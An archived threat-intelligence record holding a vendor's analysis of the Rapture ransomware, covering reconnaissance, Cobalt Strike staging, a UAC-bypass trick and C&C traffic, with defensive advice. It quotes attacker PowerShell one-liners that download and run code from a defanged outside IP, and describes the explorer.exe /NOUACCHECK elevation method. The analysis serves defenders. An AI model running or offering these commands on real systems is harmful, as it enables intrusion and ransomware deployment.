{
	"id": "c232bc61-409b-4021-bf5b-b574adbf85cd",
	"created_at": "2026-04-06T00:10:54.196305Z",
	"updated_at": "2026-04-10T13:13:05.246415Z",
	"deleted_at": null,
	"sha1_hash": "e22eb00702804d36b7e5c029056dc84e9ee10d9b",
	"title": "Rapture, a Ransomware Family With Similarities to Paradise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 491245,
	"plain_text": "Rapture, a Ransomware Family With Similarities to Paradise\r\nBy Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw ( words)\r\nPublished: 2023-04-28 · Archived: 2026-04-05 22:38:30 UTC\r\nRansomware\r\nIn March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with\r\ntools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the\r\nperpetrators and how quickly they managed to carry out the ransomware attack.\r\nBy: Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw Apr 28, 2023 Read time: 5 min (1434 words)\r\nSave to Folio\r\nIntroduction\r\nIn March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with\r\ntools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the\r\nperpetrators and how quickly they managed to carry out the ransomware attack.\r\nThe memory dump during the ransomware’s execution reveals an RSA key configuration file similar to that used\r\nby the Paradise ransomwarenews- cybercrime-and-digital-threats. To make analysis more difficult, the attackers\r\npacked the Rapture ransomware using Themida, a commercial packer. Rapture requires at least a .NET 4.0\r\nframework for proper execution; this suggests more similarities with Paradise, which has been known to be\r\ncompiled as a .NET executable. For this reason, we dubbed this ransomware type as Rapture, a closely related\r\nnomenclature to Paradise.\r\nIt is important to note that although it shares certain similarities with Paradise, Rapture’s behavior is different from\r\nthe former.\r\nDiscovery, reconnaissance, and staging                \r\nIn April, we found a couple of ransomware activities that appear to be injected in legitimate processes. By tracing\r\nthese activities back to the source process, we found that the ransomware appeared as an activity loaded into\r\nmemory from a Cobalt Strike beacon. In some instances, the attackers dropped the ransomware in a folder or drive\r\nas a *.log file:\r\n E:\\ITS.log\r\n C:\\[Redacted]\\Aps.log\r\nThe Rapture ransomware drops its notes to every traversed directory (the first six characters might appear to\r\nrandom, but they are actually hard-coded string configurations).\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 1 of 6\n\n7qzxid-README.txt\r\nqiSgqu-README.txt\r\nIt then appends the same six characters to the following encrypted files:\r\n*.7qzxid\r\n*.qiSgqu\r\nRapture requires certain command lines (shown in Figure 2) to execute properly. Once the correct argument is\r\npassed to the malicious file, it will start the ransomware routine as also displayed in its console window.\r\nAll\r\nopen on a new tab\r\nFigure 2. Execution of the Rapture ransomware using the correct command-line arguments (top)\r\nand the console window during ransomware execution (bottom)\r\nThe dropped ransom note bears some resemblance to the Zeppelin ransomwarenews- cybercrime-and-digital-threats (although we believe this is the only connection between the two). We tried to gleam additional\r\ninformation from the ransom note and discovered that the Rapture ransomware has been around for a while now,\r\nbut there were no samples available during its initial sighting.\r\nDuring our investigation, we discovered that the whole infection chain spans three to five days at most (counting\r\nfrom the time of discovery of the reconnaissance commands). Rapture’s operators first perform the following,\r\nlikely to guarantee a more successful attack:\r\nInspect firewall policies\r\nCheck the PowerShell version\r\nCheck for vulnerable Log4J applets\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 2 of 6\n\nopen on a new tab\r\nFigure 4. One of the PowerShell command lines found during the reconnaissance stage\r\nAfter a successful reconnaissance routine, the attackers proceed with the first stage of the attack by downloading\r\nand executing a PowerShell script to install Cobalt Strike in the target’s system.\r\nAfter the reconnaissance stage, the attackers will try to gain access to the victim’s network (likely through\r\nvulnerable public-facing websites and servers since their initial entry is via w3wp.exe for PowerShell execution).\r\nThe following command is used for the first execution instance of PowerShell through w3wp.exe:\r\n/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object\r\nNet.WebClient).DownloadString(‘[hxxp]://195.123.234[.]101:80/Sharepoint/Pickers.aspx’)\r\nMeanwhile, the second execution instance, this time from Windows Management Instrumentation (WMI), is done\r\nvia the following command:\r\n/c powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object\r\nNet.WebClient).DownloadString('[hxxp]://195.123.234[.]101:80/Microsoft/Online')\r\nThe attacks use a unique method of obtaining higher privileges to execute the payload. By default, there is a task\r\nin newer versions of Windows called CreateExplorerShellUnelevatedTask that prevents explorer.exe from running\r\nwith elevated privileges. However, if explorer.exe is launched using the command line /NOUACCHECK, it\r\ninherits the elevated status from the parent process. In this case, the malicious actors injected the malicious\r\nactivity into an existing svchost.exe, which serves as the parent process. The svchost.exe process then executes\r\nexplorer.exe using the /NOUACCHECK command. Once this is done, explorer.exe can then be used to drop and\r\nexecute the second stage Cobalt Strike beacon downloader.\r\nThe second-stage downloader will then connect to the following address to download the main Cobalt Strike\r\nbeacon: 195.123.234[.]101/DoFor/review/Mcirosoft\r\nThe data response from the command-and-control (C\u0026C) server contains the encrypted beacon sandwiched in the\r\nmiddle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain).\r\nThe downloader decrypts the sandwiched code and then executes the Cobalt Strike beacon.\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 3 of 6\n\nopen on a new tab\r\nFigure 6. The Cobalt Strike downloader C\u0026C server response containing the encrypted beacon\r\nThe second (main) stage beacon will attempt to connect to another subfolder in the same C\u0026C server, where it\r\nwill attempt to receive the backdoor command and other payloads. Similarly, the response of the C\u0026C server is\r\nalso sandwiched in another JavaScript code that will be decoded by the following\r\nbeacon: 195.123.234[.]101/Make/v8.01/Sharepoint\r\nBased on our analysis of the decrypted C\u0026C response from the beacon, we have deduced that the decoded content\r\nwill have the following structure (after the beacon removes the garbage padding):\r\nOffset Length Data Description\r\n0x00 0x04 N/A Four-byte header\r\n0x04 0x04 0x04000000 Flag (big endian will convert to little endian after decryption)\r\n0x08 0x04 0xnn000000\r\nBackdoor command (big endian will convert to little endian after\r\ndecryption)\r\n0x0c 0x04 N/A\r\nData size, length of additional data from the response; big endian\r\nwill convert to little endian after decryption\r\n0x10\r\nDepends on\r\n[0x0c]\r\nN/A\r\nAdditional data to be supplied to some of the backdoor\r\ncommands\r\nTable 1. The structure of the decrypted C\u0026C server response from the beacon communication\r\nWe found that the beacon performed ransomware activities in majority of the affected systems, which implies that\r\nthe code is downloaded and executed in memory except for a few machines where we found the actual\r\nransomware.\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 4 of 6\n\nWe tried to gather more information about the Cobalt Strike beacon via its watermark, where we discovered that\r\nthe same watermark is also used by other threat actors. This indicates that it is likely that Rapture’s operators are\r\nusing a pirated Windows license which is also being used by several others. \r\nopen on a new tab\r\nFigure 7. The particular Cobalt Strike watermark as seen in relation to different groups\r\nConclusion                         \r\nThe Rapture ransomware is cleverly designed and bears some similarities to other ransomware families such as\r\nParadise. Although its operators use tools and resources that are readily available, they have managed to use them\r\nin a way that enhances Rapture’s capabilities by making it stealthier and more difficult to analyze. As is the case\r\nwith many modern families, these types of fairly sophisticated ransomware are beginning to become the norm in\r\nmany present-day campaigns.                      \r\nRecommendations and Solutions\r\nTo protect their systems from ransomware attacks, organizations can implement security frameworks that\r\nsystematically allocate resources to establish a robust defense strategy. Here are some recommended guidelines\r\nfor organizations consider:\r\nConduct an inventory of assets and data.\r\nIdentify authorized and unauthorized devices and software.\r\nAudit event and incident logs\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 5 of 6\n\nManage hardware and software configurations.\r\nGrant admin privileges and access only when necessary for an employee's role.\r\nMonitor network ports, protocols, and services.\r\nEstablish a software allowlist that only allows legitimate applications to execute.\r\nImplement data protection, backup, and recovery measures.\r\nEnable multifactor authentication (MFA).\r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web,\r\nand network.\r\nWatch for early signs of an attack, such as the presence of suspicious tools in the system.\r\nOrganizations can adopt a multifaceted approach to secure potential entry points into their systems, such as\r\nendpoints, emails, webs, and networks. By using security solutions that can detect malicious elements and\r\nquestionable activities, enterprises can protect themselves from ransomware attacks.\r\nA multilayered approach can help organizations guard possible entry points into their system (endpoint, email,\r\nweb, and network). Security solutions can detect malicious components and suspicious behavior, which can help\r\nprotect enterprises. \r\nTrend Micro Vision One™products provides multilayered protection and behavior detection, which helps\r\nblock questionable behavior and tools before the ransomware can do any damage. \r\nTrend Micro Cloud One™ – Workload Securityproducts protects systems against both known and\r\nunknown threats that exploit vulnerabilities. This protection is made possible through techniques such as\r\nvirtual patching and machine learning.  \r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced\r\nanalysis techniques to effectively block malicious emails, including phishing emails that can serve as entry\r\npoints for ransomware.  \r\nTrend Micro Apex One™products offers next-level automated threat detection and response against\r\nadvanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints. \r\n \r\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html"
	],
	"report_names": [
		"rapture-a-ransomware-family-with-similarities-to-paradise.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434254,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.pdf",
		"text": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.txt",
		"img": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.jpg"
	}
}